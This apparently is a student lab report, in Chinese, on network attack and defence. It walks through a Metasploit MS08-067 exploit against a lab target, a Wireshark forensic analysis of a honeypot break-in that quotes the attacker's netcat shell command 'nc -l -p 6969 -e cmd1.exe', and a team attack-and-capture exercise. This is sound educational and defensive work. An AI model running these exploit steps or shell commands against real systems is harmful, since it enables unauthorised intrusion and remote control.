网络攻防实践实践六

一、实验要求

1.1 动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

1.2 取证分析实践:解码一次成功的NT系统破解攻击

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

  • 攻击者使用了什么破解工具进行攻击
  • 攻击者如何使用这个破解工具进入并控制了系统
  • 攻击者获得系统访问权限后做了什么
  • 我们如何防止这样的攻击
  • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

1.3 团队对抗实践:windows系统远程渗透攻击和分析

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

二、实验过程

2.1 动手实践Metasploit windows attacker

打开kali,输入命令msfconsole启动Metasploitable控制台

输入search ms08_067 对于ms08_067漏洞攻击模块

输入命令 use exploit/windows/smb/ma08_067_natapi,打开反向连接的载荷

输入命令 show options 查看设置及参数

输入命令 show payloads,显示所有可攻击载荷

然后输入 set LHOST 192.168.200.5/set RHOST 192.168.200.124,设置RHOST和反向连接的监听ip LHOST

输入exploit进行攻击,并在Kali上执行 ipconfig ,查询到靶机的IP,说明攻击成功

2.2 取证分析实践:解码一次成功的NT系统破解攻击

 使用wireshark打开snort-0204@0117.log文件,并在过滤框中输入过滤条件 ip.dst == 172.16.1.106 and http

跟踪数据包的数据流,观察到数据中包含“%C0%AF”,“%C0%AF”为Unicode编码,因此推测为Unicode漏洞攻击。

继续分析数据流,可发现shell语句

通过数据流可发现攻击者执行命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe,表示攻击者连接了6969端口,并且获得了访问权限

分析http数据流,可以发现攻击者的删除操作

2.3 团队对抗实践:Windows系统远程渗透攻击和分析

攻方使用metasploit选择漏洞进行攻击,获得控制权。防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

攻击机:192.168.200.5(于庚辰kali)
防守方:192.168.200.124(邱时健windows2k)

按照实践一步骤对靶机进行攻击

同时打开wireshark对攻击过程进行抓包

攻击方获得电脑控制权后在对方c盘添加“姓名+学号”命名形式的文件夹

此时查看防守方机的c盘文件,发现攻击者成功创建文件

三、学习中遇到的问题及解决方法 

问题1:在实践一中windows靶机与kali攻击机无法ping通

解决1:将kali虚拟机网络适配器改为net8模式,使其处于同一局域网

四、实践总结

本次实验使我从理论学习和切身实践中学会了如何使用Metasploit工具,对操作系统漏洞的危害性有了更深刻的认识,使我能够在今后的网络防护中更加透彻地理解。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值